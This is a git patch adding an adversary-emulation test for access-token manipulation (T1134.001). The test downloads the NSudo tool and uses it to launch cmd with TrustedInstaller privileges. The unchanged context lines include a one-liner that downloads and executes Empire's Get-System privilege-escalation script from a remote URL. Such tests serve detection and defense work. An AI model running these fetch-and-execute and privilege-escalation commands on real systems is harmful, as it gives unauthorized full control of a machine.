From 3283daa547ff9a7b2d8e591bc292c2e7e6ea0c9c Mon Sep 17 00:00:00 2001
From: BlueDragon-01 <101390770+BlueDragon-01@users.noreply.github.com>
Date: Mon, 22 Aug 2022 09:48:45 -0500
Subject: [PATCH] Update T1134.001.yaml (#2091)

Launches the NSudo executable for a short period of time and then exits.  NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
---
 atomics/T1134.001/T1134.001.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)

diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml
index 2d0248d3..88716836 100644
--- a/atomics/T1134.001/T1134.001.yaml
+++ b/atomics/T1134.001/T1134.001.yaml
@@ -29,3 +29,31 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
     name: powershell
     elevation_required: true
+- name: Launch NSudo Executable
+  description: |-
+    Launches the NSudo executable for a short period of time and then exits.
+    NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+  supported_platforms:
+  - windows
+  input_arguments:
+    nsudo_path:
+      description: 'Path to the NSudo bat file'
+      type: Path
+      default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      NSudo.bat must exist in the specified path #{nsudo_path}
+    prereq_command: |
+      if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+      Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
+      Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+      Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+  executor:
+    command: |
+     Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+     Start-Sleep -Second 5
+     Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+    name: powershell